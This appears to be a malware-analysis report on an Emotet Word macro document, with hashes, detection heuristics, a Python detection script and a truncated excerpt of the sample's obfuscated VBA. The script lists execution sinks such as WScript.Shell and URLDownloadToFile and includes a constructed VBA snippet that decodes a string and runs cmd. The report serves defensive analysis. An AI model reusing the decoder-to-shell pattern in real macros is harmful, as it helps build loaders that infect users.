Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e333768e423c4aa3…

MALICIOUS

Office (OLE)

Size: 243.5 KB
Created: 2019-10-09 23:26:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: e60c3b1be6674bca9a254b0a63dfab6f
SHA-1: ed36fc03ffe5325938fab6625ab85f68d572a832
SHA-256: e333768e423c4aa3e8d064045ab3245ce04700293b0ea520ebf5e5475ebf8da4
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file carries critical heuristics for an obfuscated auto-exec VBA loader: an AutoOpen entry point, a heavy custom string decoder and a CreateObject execution sink, a loader shape consistent with Emotet's known maldocs. The extracted VBA source is padded with junk comment lines (fake street addresses) and dead arithmetic (Cos, Rnd, CInt, CByte, CDbl on throwaway variables) that bury a small amount of real logic; the downloader intent is supported by the ClamAV name Doc.Downloader.Emotet rather than by any URL or shell command visible in the macro source (the only URL extracted is an OOXML schema namespace). The legacy WordBasic auto-exec marker and the Excel 4.0 macro-sheet finding are medium-severity indicators of additional macro execution surface and do not attribute the sample on their own; note that the WordBasic heuristic's own description assumes no VBA project was recovered, while a 158,469-byte VBA source was in fact extracted, so treat that marker as corroborating at most.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-7331189-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7331189-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps the ProgIDs, shell commands and URLs out of the macro source as literal strings, so string-based scanners see only the decoder and the sink call, not what is passed to it.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML XML namespace identifier, not a network indicator; no download URL was recovered from the macro source.
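The two macro heuristics above (the obfuscated auto-exec loader shape and the p-code token co-occurrence check) can be approximated in a few lines of Python. The block below is an added illustration written for this page, not the analysis engine's own code and not oletools: it strips junk comment lines, folds the Chr()-run and Replace()-junk-token decoder shapes back into strings, looks for an auto-exec entry point and execution sinks, and separately scans a raw byte stream for the same tokens in ASCII and UTF-16LE. The VBA snippet and the byte stream are constructed in the shape of the extracted preview; they are not the sample's decoded payload, and the token lists, regexes and severity thresholds are assumptions.

```python
import re

# Entry points and execution/object sinks that the heuristics above key on (assumed lists).
AUTOEXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose",
                   "Document_Open", "Document_Close", "Workbook_Open")
SINK_TOKENS = ("CreateObject", "GetObject", "WScript.Shell", "Shell", "winmgmts",
               "Win32_Process", ".Run", ".Exec", "URLDownloadToFile", "XMLHTTP")
AUTOEXEC_RE = re.compile(r"\b(" + "|".join(map(re.escape, AUTOEXEC_TOKENS)) + r")\b", re.I)
SINK_RE = re.compile("(" + "|".join(map(re.escape, SINK_TOKENS)) + ")", re.I)
# Decoder shapes named by the loader heuristic: numeric char arrays, hex-string
# decoding, and junk-token removal via Replace().
DECODER_SHAPES = {
    "chr-array":    re.compile(r"(?:ChrW?\s*\(\s*\d+\s*\)\s*&\s*){2,}ChrW?\s*\(\s*\d+\s*\)", re.I),
    "hex-decode":   re.compile(r"&H[0-9A-F]{2}|Val\s*\(\s*\"&H\"", re.I),
    "junk-replace": re.compile(r"Replace\s*\(\s*\"([^\"]*)\"\s*,\s*\"([^\"]+)\"\s*,\s*\"\"\s*\)", re.I),
}
# Decoy arithmetic of the kind seen in the extracted preview (Cos/Rnd/CInt/CByte/CDbl on dead variables).
DECOY_RE = re.compile(r"\b(Cos|Sin|Tan|Sqr|Rnd|CInt|CByte|CDbl)\s*\(", re.I)


def strip_junk(src):
    """Drop blank and comment-only lines; return (code_lines, junk_comment_ratio)."""
    lines = [l for l in src.splitlines() if l.strip()]
    comments = [l for l in lines if l.strip().startswith("'")]
    code = [l for l in lines if not l.strip().startswith("'")]
    return code, len(comments) / max(1, len(lines))


def recover_strings(code_lines):
    """Statically fold two decoder shapes: runs of Chr(n) & Chr(n) ... and
    Replace("<str>", "<junk-token>", "")."""
    out = []
    for line in code_lines:
        for m in DECODER_SHAPES["chr-array"].finditer(line):
            out.append("".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))))
        for s, tok in DECODER_SHAPES["junk-replace"].findall(line):
            out.append(s.replace(tok, ""))
    return out


def analyze_vba(src):
    """Score VBA source for the obfuscated auto-exec loader shape."""
    code, junk_ratio = strip_junk(src)
    text = "\n".join(code)
    decoded = recover_strings(code)
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(text)})
    # Sinks are searched in the code and in the recovered strings, so a ProgID
    # or command that only exists after decoding still counts.
    sinks = sorted({m.group(1).lower() for m in SINK_RE.finditer(text + "\n" + "\n".join(decoded))})
    shapes = sorted(n for n, rx in DECODER_SHAPES.items() if rx.search(text))
    if autoexec and sinks and shapes:
        verdict = "critical"   # auto-exec + decoder + sink: the loader shape
    elif autoexec and sinks:
        verdict = "high"       # plain auto-exec with a sink, no decoder
    else:
        verdict = "info"
    return {"verdict": verdict, "autoexec": autoexec, "sinks": sinks,
            "decoder_shapes": shapes, "decoded": decoded,
            "decoy_math_calls": len(DECOY_RE.findall(text)),
            "junk_comment_ratio": junk_ratio}


def scan_stream_tokens(blob):
    """p-code / cache-stream check: look for the same tokens as ASCII or
    UTF-16LE bytes, which still works when source extraction fails."""
    hits = {"autoexec": set(), "exec": set()}
    low = blob.lower()
    for kind, toks in (("autoexec", AUTOEXEC_TOKENS), ("exec", SINK_TOKENS)):
        for t in toks:
            if any(t.encode(enc).lower() in low for enc in ("latin-1", "utf-16-le")):
                hits[kind].add(t)
    return {k: sorted(v) for k, v in hits.items()}


def pcode_autoexec_exec(blob):
    """True when an entry-point token and an execution token co-occur in the stream."""
    h = scan_stream_tokens(blob)
    return bool(h["autoexec"] and h["exec"])


# Constructed sample in the shape of the extracted preview (junk address comments,
# dead arithmetic, string decoding feeding CreateObject). Not the sample's decoded payload.
SAMPLE_VBA = r'''
Sub AutoOpen()
    'Direct7606 Ward Flat, North Tania, Nepal Human572 Fritsch Meadows
    On Error Resume Next
    'Internal30090 Herman Turnpike, South Tevin, Burundi
    c0c57060036 = Cos(x4x17070032x8)
    c890b120bb638 = Rnd(b050920c05010)
    'Regional1033 Gillian Tunnel, North Kale, Bhutan
    k = Replace("wJUNKsJUNKcJUNKrJUNKiJUNKpJUNKt", "JUNK", "")
    Set o = CreateObject(k & ".Shell")
    'Lead832 Rodolfo Greens, Littelbury, Bangladesh
    o.Run Chr(99) & Chr(109) & Chr(100), 0
End Sub
'''
# Constructed stand-in for a compiled VBA stream: tokens mixed with binary, one in UTF-16LE.
SAMPLE_STREAM = b"\x00\x01\x10AutoOpen\x00\x02" + "CreateObject".encode("utf-16-le") + b"\x00\x07Shell\x00"

if __name__ == "__main__":
    print(analyze_vba(SAMPLE_VBA))
    print(scan_stream_tokens(SAMPLE_STREAM), pcode_autoexec_exec(SAMPLE_STREAM))
```

To run it against a real olevba dump, pass the file contents to analyze_vba; the junk_comment_ratio and decoy_math_calls fields are what make a preview like the one below stand out even before any string is decoded, and scan_stream_tokens is the fallback for documents where only the compiled stream is available.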

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  158469 bytes
SHA-256: e8102886ed008444cc36522fabdfa9b57db7b13232c8ef4855d49b383cd60f1c
Preview (first 1,000 lines of the extracted script; excerpt below is truncated):
Attribute VB_Name = "b000806168b"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "cc62b0b7963c7, 0, 0, MSForms, TextBox"
Attribute VB_Control = "x9006x00126, 1, 1, MSForms, TextBox"
Attribute VB_Control = "bcbxb48b064, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x53bbb894x989, 3, 3, MSForms, TextBox"
Attribute VB_Control = "xc90302518b, 4, 4, MSForms, TextBox"
Attribute VB_Control = "cb3c2050cxx, 5, 5, MSForms, TextBox"

Attribute VB_Name = "x86c50xc400b3"
Function b830095910700()
On Error Resume Next
   'Direct7606 Ward Flat, North Tania, Nepal Human572 Fritsch Meadows, Kiehntown, Suriname
b0x00b23000 = True
'Internal30090 Herman Turnpike, South Tevin, Burundi Principal862 Sylvester Plains, Cummerataview, Slovakia (Slovak Republic)
Select Case c0950cb00c00
'Regional9087 Teresa Isle, Feilstad, Malta Forward371 Monserrat Parkway, North Beaulahberg, United Arab Emirates
         Case x63c9027271
         'Chief62483 Jamel Mission, Port Baronton, Guyana Legacy46484 Arnaldo Road, Lisandroborough, Cocos (Keeling) Islands
         'Forward77085 Adrain Plaza, Zechariahside, Monaco Investor718 Koss Tunnel, West Jevonmouth, Morocco
c400xc7351b60 = False
'Direct0990 Lonnie Mountains, Abelardobury, Ecuador Dynamic21888 Maximilian Terrace, North Wilson, Cayman Islands
            b010300050b9 = bb20433xc90
            'Human79433 Cummings Walk, Madysonburgh, Pakistan Senior0988 Wilderman Harbors, Port Chloe, Slovakia (Slovak Republic)
            c318070x54490 = CInt(b1053b0b0760 - CByte(b5x40c61c3b2))
            'Corporate4602 Patience Course, West Lou, Papua New Guinea Direct74740 Schuster Field, Spencerstad, Germany
            c0c57060036 = Cos(x4x17070032x8)
'Direct085 Botsford Harbor, Dietrichberg, Italy Central84671 Parisian Inlet, Bartonmouth, Malta
x83b09304b4 = True
'Lead832 Rodolfo Greens, Littelbury, Bangladesh Central952 Zulauf Hollow, Casimirport, Saint Kitts and Nevis
            c890b120bb638 = Rnd(b050920c05010)
            'Internal54859 Nienow Center, Homenickland, Mauritania Human090 Wayne Square, Virgilchester, Serbia
         Case x188c1840406
         'Senior4434 Sanford Club, South Reganstad, Netherlands Antilles Direct627 Effertz Keys, South Vernahaven, Mexico
            c92573675680 = bb04260280c60
            'Senior001 Odell Lane, West Maribelland, Mexico Customer7283 Colleen Isle, West Ibrahim, Maldives
            b0908b9802cb = CDbl(x039000542466)
            'International21510 Lempi Streets, South Alexandrinefurt, Mali National33747 Maxwell Garden, Kreigerborough, Timor-Leste
End Select
'Regional1033 Gillian Tunnel, North Kale, Bhutan Lead914 Greenholt Brooks, Jerdebury, Tunisia
xx5xb080008 = False
'Regional26106 Lysanne Estates, New Carlee, Kiribati Chief76031 Robyn Fork, Port Dax, Mongolia
   'International29783 Schinner Viaduct, Port Oscar, Brunei Darussalam Future515 Christine Rapid, Madelynport, Algeria
x73bcx3669613 = True
'Direct362 Howard Pass, Flossiemouth, Peru Internal8905 Simonis Summit, South Amy, Tunisia
Select Case x18cxx0b806
'Direct2739 Brown Loaf, Port Edgarview, Liechtenstein Lead0708 Kuhic Throughway, Mullerton, Bangladesh
         Case c9c0009400720
         'Chief783 Margie Fields, North Jadyntown, Cote d'Ivoire Central059 Kertzmann Knolls, Kevontown, Benin
         'Direct7341 Ray Crossing, Leonoraberg, Romania Dynamic82592 Balistreri Street, New Alisonborough, Madagascar
bx01600073b0 = False
'National8823 Luciano Inlet, Lake Abigayle, Ghana Dynamic66522 Shields Village, Welchmouth, Bermuda
            c17060078470 = bx0x9367b370
            'Investor890 Vinnie Terrace, Lake Princebury, Montenegro International29023 Chasity Shore, Pollichburgh, Indonesia
            b69040c803560 = CInt(b89b4565b1x0 - CByte(x3800xb8940))
            'Human8670 Palma Port, West Virginie, Cambodia 
... (truncated)